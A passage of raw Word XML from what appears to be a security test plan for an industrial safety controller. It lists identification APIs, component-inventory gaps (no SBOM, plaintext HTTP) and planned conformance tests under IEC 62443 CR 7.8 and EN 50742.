        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543B3363" w14:textId="11DE5046" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00B67525" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> B (Config), D (Safety Firmware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2F4137" w14:textId="49F13C60"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B67525" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tampering</w:t>
      </w:r>
      <w:r w:rsidR="00F60998" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096784ED" w14:textId="77777777" w:rsidR="00E33A9C"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6DA6E012" w14:textId="77777777" w:rsidR="00ED2D2F" w:rsidRPr="006D5B99" w:rsidRDefault="00E33A9C" w:rsidP="00ED2D2F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Version/identification </w:t>
      </w:r>
      <w:r w:rsidR="00ED2D2F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B3BBC" w14:textId="6C78B439" w:rsidR="00E33A9C" w:rsidRPr="006D5B99" w:rsidRDefault="00E33A9C" w:rsidP="00ED2D2F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/deviceinfo/hwversion, /hwrevision, /swrevision, /swinfo/scpuversion, /swinfo/cpubootloaderversion, /swinfo/scpubootloaderversion (SRIO-2946 ff.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6F5092" w14:textId="2602B0A4" w:rsidR="00E33A9C" w:rsidRPr="006D5B99" w:rsidRDefault="00E33A9C" w:rsidP="00E33A9C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I&amp;M0 / I&amp;M5</w:t>
      </w:r>
      <w:r w:rsidR="00BF2CEC" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identity (MANUFACTURER_ID, ORDER_ID, SERIAL, HW/SW revision) and host-fw annotation</w:t>
      </w:r>
      <w:r w:rsidR="00BF2CEC" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PROFINET acyclic records (SRIO-3002/3023).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AFBB5E" w14:textId="22DF7589" w:rsidR="00E33A9C" w:rsidRPr="006D5B99" w:rsidRDefault="00E33A9C" w:rsidP="00BF2CEC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I&amp;M4 data fingerprint</w:t>
      </w:r>
      <w:r w:rsidR="00BF2CEC" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00EA5B7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4B40C" w14:textId="7CCF9377" w:rsidR="00EB240D" w:rsidRPr="006D5B99" w:rsidRDefault="00EB240D" w:rsidP="00EB240D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">G-1 (residual only): I&amp;M4 identifies </w:t>
      </w:r>
      <w:r w:rsidR="00EA5B7B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a specific configuration is loaded</w:t>
      </w:r>
      <w:r w:rsidR="00EA5B7B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">but the device does not enumerate/classify </w:t>
      </w:r>
      <w:r w:rsidR="00EA5B7B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> data elements are EHSR-critical. Report this as the residual limitation, not as ‘data is not addressed.’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199BF24D" w14:textId="6E4838B4" w:rsidR="00EB240D" w:rsidRPr="006D5B99" w:rsidRDefault="00EB240D" w:rsidP="00EB240D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r w:rsidR="004B6A61" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 7.8 expects identification of the third-party software genuinely critical for EHSR compliance: µC/OS-II (SRIO-1260), the SIL3 PROFIsafe stack (SRIO-1929), the STM32F7 self-test library (SRIO-10766), the netX90 PROFINET stack (SRIO-1768). Only top-level version strings are exposed and there is no SBOM </w:t>
      </w:r>
      <w:r w:rsidR="004B6A61" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> these cannot be inventoried or CVE-correlated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598D9EC1" w14:textId="19B24BE4" w:rsidR="00EB240D" w:rsidRPr="006D5B99" w:rsidRDefault="00EB240D" w:rsidP="00EB240D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3</w:t>
      </w:r>
      <w:r w:rsidR="008365E0" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identification is served over plaintext HTTP (SRIO-7903/7907). Keep as a </w:t>
      </w:r>
      <w:r w:rsidR="00214F2D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-in-depth observation only; under EN 50742 Approach B this is </w:t>
      </w:r>
      <w:r w:rsidR="00385822" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a safety-security conformance FAIL (FR4 = none).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C6EBDF" w14:textId="74CB0976" w:rsidR="002B119D" w:rsidRPr="006D5B99" w:rsidRDefault="002B119D" w:rsidP="002B119D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B781E81" w14:textId="77777777" w:rsidR="002B119D" w:rsidRPr="006D5B99" w:rsidRDefault="002B119D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286CC92D" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRPr="006D5B99" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB43899" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRPr="006D5B99" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532DC787" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRPr="006D5B99" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73017307" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRPr="006D5B99" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31410AAF" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRPr="006D5B99" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B90954F" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRPr="006D5B99" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4C4677" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRPr="006D5B99" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FEA7D61" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRPr="006D5B99" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F6EBF6" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRPr="006D5B99" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C58BBB2" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRPr="006D5B99" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="706438CF" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRPr="006D5B99" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703E5D22" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRPr="006D5B99" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2331FE72" w14:textId="77777777" w:rsidR="0052540B" w:rsidRPr="006D5B99" w:rsidRDefault="0052540B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DF6F95" w14:textId="77777777" w:rsidR="002B119D" w:rsidRPr="006D5B99" w:rsidRDefault="002B119D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E26A9C1"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3C4B28EE"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6D5B99"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6D5B99" w:rsidRDefault="00136AF5" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DB54CFC"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5F57587B"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4EA471E"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AB71AF9" w14:textId="77777777" w:rsidR="00136AF5" w:rsidRPr="006D5B99"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136AF5" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00136AF5" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62BADD40" w14:textId="77777777" w:rsidR="00BC45CE"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 xml:space="preserve">Enumerate the identification surface (/deviceinfo/*, I&amp;M0, I&amp;M5, /firmware/version, /fieldbussetup/fieldbusfirmware, I&amp;M4 for data); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E92EE91" w14:textId="34CE2053" w:rsidR="00136AF5" w:rsidRPr="006D5B99"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build the actual inventory and diff vs. expected EHSR-critical SW+data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25D718E7" w14:textId="7C27F174" w:rsidR="00136AF5" w:rsidRPr="006D5B99"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Functional CR 7.8; confirms SW + data (I&amp;M4) identification; exposes </w:t>
            </w:r>
            <w:r w:rsidR="00F73B00" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>G2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47E322CB" w14:textId="45505296"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000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Requirements-based verification;</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP FSTM Stage 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FBAAD85" w14:textId="1B4CC660" w:rsidR="00136AF5" w:rsidRPr="006D5B99"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SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00136AF5" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00136AF5" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DE3C5C2" w14:textId="257DE463" w:rsidR="005F11CE"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SBOM-completeness / version</w:t>
            </w:r>
            <w:r w:rsidR="00E04FD4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E04FD4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidR="00E04FD4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE analysis: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65F25E63" w14:textId="77777777" w:rsidR="00412834"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attempt to derive third-party components (µC/OS-II, PROFIsafe stack, STM STL, netX90); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4793CF3F" w14:textId="1CEF97E1" w:rsidR="00136AF5" w:rsidRPr="006D5B99"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show no SBOM </w:t>
            </w:r>
            <w:r w:rsidR="00E04FD4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> no CVE correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C826CF2" w14:textId="78932F79" w:rsidR="00136AF5" w:rsidRPr="006D5B99"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="029A3737" w14:textId="556795DE" w:rsidR="00136AF5" w:rsidRPr="006D5B99"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BSI TR-03183-2; 62443-4-1 SM-9/SM-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7144EE67" w14:textId="6BA3FAEB" w:rsidR="00136AF5" w:rsidRPr="006D5B99"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136AF5" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00136AF5" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EE5BF67" w14:textId="2EE99C1F" w:rsidR="00136AF5" w:rsidRPr="006D5B99"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Passive plaintext capture of the identification traffic (defence-in-depth observation, not a FAIL under EN 50742 FR4=none)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EEC9301" w14:textId="4C374469" w:rsidR="00136AF5" w:rsidRPr="006D5B99"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Documents G-3 (DiD only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FB15FAC" w14:textId="77777777"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§3.5; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BFB51B8" w14:textId="4C14A958" w:rsidR="007C27F1"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ISTG-DES-INFO; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04D07D3C" w14:textId="7B393035"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ifm CM-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D61219D" w14:textId="1358ABA2" w:rsidR="00136AF5" w:rsidRPr="006D5B99"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136AF5" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00136AF5" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CF9293B"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Data-identification fingerprint check: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B7BD88"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for config A; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28DAF117" w14:textId="77777777" w:rsidR="008F3992"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load a different config B; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50976153" w14:textId="77777777" w:rsidR="00082D8A"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read I&amp;M4; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="688222D6" w14:textId="636C6F7D" w:rsidR="00136AF5" w:rsidRPr="006D5B99"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confirm the signature uniquely </w:t>
            </w:r>
            <w:r w:rsidR="00C87885" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>characterizes</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the loaded config</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="637F5E28" w14:textId="7AD74BA8" w:rsidR="000D1FFC" w:rsidRPr="006D5B99"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the partial DATA-identification control (corrects G-1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD844F3" w14:textId="74A6CC32" w:rsidR="00136AF5" w:rsidRPr="006D5B99"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Requirements-based verification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="284C0C62" w14:textId="77777777" w:rsidR="00890F42" w:rsidRPr="006D5B99"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6D5B99"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5311B64C" w14:textId="77777777" w:rsidR="00FB5631" w:rsidRPr="006D5B99" w:rsidRDefault="00FB5631" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255C58A1" w14:textId="77777777" w:rsidR="00FB5631" w:rsidRPr="006D5B99" w:rsidRDefault="00FB5631" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A2E3F67" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3 - Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E55C966" w14:textId="77777777" w:rsidR="00890F42" w:rsidRPr="006D5B99" w:rsidRDefault="00890F42" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA33CDB" w14:textId="1B13E641" w:rsidR="00CB0BEC" w:rsidRPr="006D5B99" w:rsidRDefault="00CB0BEC" w:rsidP="00CB0BEC">
